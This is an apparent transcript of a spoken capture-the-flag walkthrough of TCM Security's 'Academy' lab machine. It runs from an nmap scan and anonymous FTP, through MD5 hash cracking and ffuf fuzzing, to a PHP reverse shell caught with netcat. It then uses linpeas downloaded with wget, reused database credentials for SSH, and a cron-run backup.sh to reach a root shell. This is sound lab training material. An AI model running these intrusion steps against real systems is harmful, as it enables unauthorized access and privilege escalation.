So hey guys, welcome back to another video on the VR hacks. And in this video, as I promised to you, that we are going to cover the part 2 of the Academy machine. So those who don't know what is Academy, so Academy basically you many of them you will know guys, it's a HTB uh, machines which is available on the Hack the Box. But those people who not able to purchase the VIP subscription, and those who don't have the VIP subscription, they cannot access this machine. But thanks to TCM Security, who created exactly same machine, and which you can install even in your virtual box also. So as you can see, I already installed this machine in my virtual box. And to hack this machine, or to say to privilege this machine, we are going to use the Kali Linux. Based on your hands-on experience, you can use any machines like Parrot, Ubuntu, as I already told you, but I will prefer the Kali Linux, which is my favorite. So without wasting time, we are going to start this video. And this machine I already solved, so I'll try to finish this video as soon as possible. So what I'm going to do, first we'll simply launch over the Academy machine. And in my previous video also I told you this machine credentials are, username is root, and the password will be TCM. Okay, so once you log in this machine, you need to import the DSC client. So what you have to type is simply type the DSC client, that's it. Again, to confirm that the client machine is exist or not. So as you can see, yes, the file exists. Now what we are going to do, to get the IP address in this machine, we will simply type the IPA. Make sure it's an old machine, so it will not going to get the IP config or the IF config. It will not work in this machine. So as you can see, after typing the IPA, and all this I already covered in my part 1, but still it just like a refresh video, so you will get an idea what I am talking about. So as you can see, the IP address of this machine is 10.0.2.12, and we are going to do the root privilege escalation to capture the flag of this machine. Okay, so what I'm going to do now, we'll simply open our terminal, and here I'm going to type a simple command, nmap -p -p, which means to scan all the 65,535 ports and our target machine, which is 10.0.2.12. So what to do guys, make a note, so you will not going to get confused. Okay, so you will not going to get confused. And also remember, please make a note if you are solving this machine, which will help you in future also. Okay, so what I'm going to do, I'll just enter the IP address, that's it. And -p, which is for the 65,535, it will going to scan all these ports. -a, you all aware about this, but who not aware about this -a, so basically it's used for the aggressive scan, which will scan all the types of vulnerability OS detections. Okay, and SV, you know very well, for the service version. And -pn for the stealthy scans, which will help you to not detect by the IDS generally. Okay, so now as you can see, we got the 21 open, which is VS FTPD. So as you can see, VS FTPD. So what you do to check that the this version is vulnerable or not, you can simply do the Google search, as I already covered in my the previous version. Apart from this, it's saying that the FTP anonymous login is allowed. Okay, so this is one positive which we got. So what I'm going to do is simply copy this, and I'll paste in my notepad, as it's saying the FTP anonymous credential login is allowed. Okay, so in this machine we can log in via the anonymous. Apart from this, there is a 22 port is also open. With the help of this, we can take the SSH connection, and 80, which means there is a web server is running on this machine. So what I'm going to do, I'm just simply note down all the open ports, 22, 21, and the 80. Okay, that's it. So now what is next steps, as it's saying that the anonymous login is allowed in the FTP. So I'm going to just clear this terminal, and we'll type FTP 10.0.2.12, and it's asking for the username. So what I'm going to do, I'll just type the anonymous, that's it. And asking the please specify the password, so we'll just double tap, and as you can see, we got this login. Okay, so login successful, which means we have the access of this machine via FTP connection. So now what we have to do, just simply type the ls for listing directory, and as you can see, there is nothing in the directory, but there is a file which name is node.txt. So what we are going to do, we'll just download this node.txt in our local machine. So for that, just simply type get node.txt, and that's it. As you can see, the file transfer is successfully completed. So what we are going to do, just we'll open our folder. Opening folder, as you can see, the file is here, which is node.txt, and we are going to open another terminal, or you can also do the split terminal vertically. Okay, so now what I'm going to do, simply I will type the cat to read this file, cat node.txt, and let me little bit maximize the screen, so it will easy for you and me to get the details more clear. So now what we are going to do, let me do one thing, we'll just clear collapse the subterminal, and we'll open another terminal. And now what I'm going to do, just type the cat node.txt to read this file. And if you will read the file properly, so it's saying, hello Heath, Grimy has set up the test website for the new academy. I told him not to use the same password everywhere. Okay, so as I told you, the machine academy is paid for now. So the TCM security team created this same machine for us for free, which we can use in the our virtual box. Okay, so now if you'll see here properly, there is a typo we saying insert into student regno. So this is not for us. We can't do much for from this information. But if you'll see, there is a hash value. Okay, so this is a hash value which I in my previous video also I told you. And there is a session ID which is here. So this is not a password and this is not a username. Okay, so what we are going to do, we'll just type the hash identifier which comes pre-default in the Linux, and we'll just copy this hash and we'll paste here to check the algorithm which is used in the hash. So that's it. Okay, so it's not taking. Let me do hash identifier and we'll type again. That's it. Okay, so it's saying not taking. Okay, let me just open the browser. Maybe I'm doing something wrong. Yeah, so what we are going to do, we'll just copy this again and I'll type the hash identifier and we'll paste this, and before the hash we are going to just give the sudo. That's it. Type the root. Yeah, so as you can see, we were able to get to know which algorithm is used in this hash. It's MD5. So what you have to do, just simply open your browser, open the browser and type MD5, or you can also use the crackstation.net, which is my favorite. You can use whatever you like MD5. There are many websites which is used to crack the MD5 algorithms. Okay, so we'll just follow this captcha, crack hashes, and that's it. As you can see, we got the result, the hash value, which if we will crack, we got the value which name is student. So what we are going to do, we'll just simply paste here, and now I'll type the exit, because here we can't get much info apart that node.txt. And here also we are going to clear this terminal. We'll click exit, and that's it. Now what we are going to do, we will try the fuzzing. Okay, we will try to do the fuzzing to get the more details about the website. So for that we are going to type ffuf-u user share dirbuster wordlist directory. So to get this, what you have to do, just simply type the locate dirbusters and you will get all the files. Okay, you will get all these files. So simply you need to type the locate dirbusters and you will get all the files. So in this we are going to use this one. Okay, in this in this one we are going to use the directly restricts 2.3 medium.txt. Okay, that's it. So I'm going to type again this command ffuf user share dirbuster word list, and that's it. And in the end you need to give the IP address of our victim machine and simply press the enter button. We'll wait until it get done, and this is much better than GoBuster because it's do more quickly. So that's it guys, our scan has been successfully completed, and as you can see in the last you will get academy php my admin. It means the website running in the website also contain the php my admin. So what we are going to do, we'll just simply open our Chrome browser and here we'll type 10.10.0.12 and in the end academy. That's it. Okay, so now it's asking enter the registration number, enter the password. So you remember guys, we cracked this hash and we got the hash value which is student, and there was a registration number which is we can also say a session ID type. So what I'm going to do, again I'm type this cat node.txt. I will copy this, hopefully it will work, and the password which we got student. Okay, yeah, so that's it guys. As you can see, we got the successfully login in the academy machine. And now here if you'll check one by one, enroll for course, enroll history, my profile, change password. So if you'll go in the change password, as you can see in our URL by it's saying .php. So what we are going to do, we'll just check that it's vulnerable or not. So for that what we are going to do, just simply clear this terminal. After clearing this terminal, we are going to type, yeah, so for that I have a tool which name is php, not a tool, it's a script. which is created by the Pentest monkey. So what we have to do, just simply copy this. Okay, what it's saying, let me do again, copy, and here we'll create a file which name is, based on you can give any name. I'm going to give this name is cd transfer, and then sudo nano shell dot php. That's it. We'll type root and we'll paste. Okay, so the machine is stuck. Let's wait. We'll refresh the screen. Okay, I think my machine is stuck on this position. Let me reset this machine. We'll wait until it gets turned on again. So this video can go longer, but you will get a lot to learn, guys. So make sure not to forward this video, otherwise you will not understand what I did, what are the steps I took to solve this machine. Okay, so we'll wait for a second. Yeah, so now what we are going to do, as I told you, there is a folder which I already created, cd transfer, and now we are going to do sudo nano shell dot php. That's it. We'll give the root password. Okay, it's saying bad log file because we are not in the root directory. Let me come in the root directory. Now we're going to type the same command, sudo nano bad log file incred. Okay, let me see why it's giving this error. Shell.php, nano shell.php. Yeah, so let me check that this file is already exist or not. Okay, yeah, so this file is not exist anymore. So what we are going to do, sudo nano shell.php. Yeah, that's it. Now we can paste this file. Okay, so I forgot I closed the browser. So what I have to do, I'm going to click this again. I'll copy this again, all the values, control C, and simply do the paste selection and come here, and it will say to change this line. Okay, so what you have to give here, we are going to give our local machine IP. Okay, so what we are going to do, we are going to give our local machine IP. My machine IP is 10.0.2.6. okay, and simply I'm going to leave this port by default. You can if you want, your wish, you can change, but I'm going to leave this by default. And now what we are going to do, we'll just simply type nc-lvp 1234. That's it. And what we are going to do, the file shell.php which we created recently, we are going to upload this file here in my, as you can see, profile.php. We'll just simply do the copy, shell.php, open, and we'll just simply do the update. That's it. We'll check that the connection we got or not. As you can see, yes, we got the successfully connection on our target machine, which is connected to 10.0.2.6. Now what we are going to do, we'll just simply type the ls. Okay, sudo, let me check who am I. Okay, sudo -l, no, locate sudo. So still we didn't got the our uh, root directory, so it means we are still suffering to get the root privilege escalation. So what we are going to do now, I'm going to open another terminal, and this time we are going to get more details about this machine. So what I'm going to do, I'll just change my directory into cd transfer, and now this time what I'm going to do, I'll type cd linpish.ch. Linpish basically it's used for, let me show you, linpish sh. So as you can see, linpish basically it's a script for the Linux privilege escalations. So what you have to do, just simply open this file in linpish.sh, and you need to copy this, all this, everything. Okay, just simply click on the control C. Okay, and now I'm going to paste this, and I'll type the control O, then control X. That's it. And now if I'll type the cd tmp pwd present working directory, and here if we'll type this chmod to give the to give the executable permission to this file. Now it's in the executable permission. So now next command we are going to type wget http 10.0.2.12, not 12, yeah, 12, and in the next we are going to type lin ps.sh. Okay, I forgot to start the server here. Python 3 -m http 80. That's it. Now we are going to type this command again. 0.2.12, which is our target machine. Then again lin ps.sh. Okay, so still it's not taking. Let me check my present working directory, which is temp. Okay, so if I type http 10.0.2.6, we'll try this one .sh. Yeah, that's it guys, we got our linpage.sh in our this file. So now what I'm going to type, we'll just check the file we got or not. So simply type the ls for listing directory. Yeah, so as you can see we got this file. Now what we are going to do, now here we are going to give the executable permission to this file. So for that we are going to type chmod plus x star, as you can also give the linpage.sh to get the executable permission. Okay, so now the next command, which will be linpage.sh, that's it, and it will start the gathering information. So we'll wait for a seconds, we'll wait for a few seconds until it get done. Okay, that's it. Now what we have to do, we'll just scroll down, scroll up. As you can see from here, we can see a small turtle, but it's no use for us. We'll just grab more information which will be useful for us. Okay, so we'll just scroll down until we get something useful for us. In the container, no, cloud empty, nothing. We need to find something like a database or something like a username and the password. So what I'm going to do, just I'm scroll down until I'll get what I need, the MariaDB, which is also exists in this, but still we didn't get what we need. Let me maximize this so it will be more clear for you and me both. Okay, still now we didn't get, yeah. So as you can see guys, in the searching password in the config php files, we got a username for the mysql, which is grimy, as you can see here, and the password which is showing here my underscore v3ry, and the username also it's given, as you can see here. Let me show you. I just saw where it is, it's gone. Let me show you. I just saw the username also, but it's a big file, so it's little bit hard to we'll grab up again. We are not getting the username, but we'll wait for a second until it get, because I don't want to skip any part, cause I will get errors also, but it will help you and help me also to solve this machine, because I told you the machine which I solved in the hack the box, it little bit different in this one. Okay, so what we have to do, we got the password, so what we are going to do, we'll just simply copy the password first, so it will be easy for us. Okay, this is the password for the mysql database, and for the username, where it is, let me capture file, it's a username admin.php config. So what we are going to do to get it more, yeah, so as you can see we got the username home grimy bash history, home grimy bash, which means the username for this is the grimy. Okay, so what we are going to do, we'll just copy the username which is grimy, copy this and just note down in your notepad. I'm telling you all this to note down in your notepad because it will be easy for you, because you don't need to do perform again and again all the scans. So what I'm going to do now, I will just simply type Control C, sudo ssh grimy, and our the target IP, which is 10.0.2.6. That's it. Okay, what it's saying, the SSH is failed. Let me type this sudo su, and now I'm going to type sudo again that command, and it's asking the password. Okay, and now the password which you copy, now we'll paste here. Yeah, so that's it guys, we got the user, we got the access in the Grimy Academy. So now the next step, we'll check what is our role in this machine. Okay, so let me clear this terminal. Who am I? So still we don't have the access, we are still a normal user. If I type the ls, yeah, so there is a file named backup.sh. so let's read this file. Cat backup.sh will get hopefully something in this file. Okay, so nothing we got in this file. Okay guys, there is nothing in this file. So what we are going to do now, this time we are going to install a file which name is pspy64. It's a Python file which is used, as you can see here also. Let me open this. So as you can see, PSPy is a command line tool. Basically it's designed to snoop and process without need for root permission. Okay, basically we can use this tool to get the root privilege escalations in the academy machines, and basically it allow you to command run by the other users, cron jobs, etc. You can read about it in your free time. Okay, so what I'm going to do, we are using the 64-bit, so I'm going to install the 64-bit version for this. Okay, so we'll wait until it get resolved, until it get done. Yeah, so that's it guys, we hopefully we successfully install this. Let me copy this, and we are going to put this in our transfer. Where is our transfer folder? That's it here. We are going to transfer this in our transfer folder. And now next command for this, which will be our, let me clear this, open this terminal, we'll stop this. And now what we are going to do, we'll just simply come back in our temp folder, ls. Again what we are going to do, we'll run this command again, python 3 -8080, and same command which we used for our netcat 1, we are going to use again in this also. We get http 10.0.2.6 linpace.sh. yeah, so hopefully we got this file into here also. As you can see, chmod plus x star, what it's saying, chmod permission denied. Okay, this denied because we didn't give the root. Yeah, okay, what it's saying, chmod plus x, it's not allowed. Okay, okay, so I think it's giving this error because this file is already in root permission. Yeah, so changing permission of system private is does not permit it, because this file is the file which we are trying to give the executive permission is already in rooted. As you can see, this is green signal, not green signal, it's already in a green signal. Okay, so now what we are going to do, our next step will be, we are going to install, not install, we are going to give this chmod, that's it. And again this pspy64, we get http 10.0.2.6 pspy64. yeah, what it's saying, connection refused. Maybe I stopped the server, maybe it's that's why it's giving this error. That's it guys, we got this also, pspy64 also here. Now what we are going to do, we'll just simply run a command -nvlp 8081, and what we are, our next step, what we are going to do, we'll just run this file also, pspy64 here. Okay, chmod plus x, now pspy64, and we'll check that our bash file grimy backup.sh is running or not. Yes, as you can see here, the period value for 4597, which is been bash grimy backup.sh file is running here. Okay, so now what we are going to do, we'll simply do the cat backup.sh, or we'll just simply come out from the temp directory, and again if I type the cat, okay, so we are still in that directory only. Let me check now. Okay, let me type the exit button. Connection refused, no issue. Will take an again connection using this password my v3 underscore 4 pass. That's it. ls cat backup dot sh. Now what we have to do, as you can see, we already running this file. What we have to do, sorry, we need to run this file. As you can, what it's saying, connection refuse. Okay, connection refuse, maybe this is the reason. Cran jobs. Let me again run this file. cd transfer ls python 3, not python 3, sorry, nc hyphen lvp 80801, and we are going to run this file again. That's it. And as you can see, we got the connection here. And if I'll check again, yeah, that's it guys, we got the root access in this machine. As you can see, nc hyphen lvp connected to this machine, our target machine, which is 10.0.2.6. let me show you again. This is our target machine, which is 10.0.2.6, and here we got successfully root permission. We are able to get the root access. Now what we are going to do, we'll clear the terminal. Okay, we cannot clear this terminal. Maybe cls, nothing with it's working. Let me type now who am I. So hooray guys, now we are root user of this machine. Let me just type ls, and here is our flag, which is name is cat flag.txt. we'll type the cat flag.txt. that's it. And let me type enter button. So yes, congratulations, you rooted this box. Look like this cms isn't too secure. I hope you enjoyed it. So that's it guys. And make sure guys, in your time, maybe chances are there in first attempt or in your second attempt, or maybe the in 4-5 attempts also, this root access will not come, because it little bit slow machine, because it's very old machine. Okay, so do not to be worried that why it's not coming. You need to do the practice again and again, and it will give you the root privileges access in this machine. Okay, so hope you understand how to solve this machine. So that's it for this video guys. We will meet in the another video, and bye bye guys, that's it.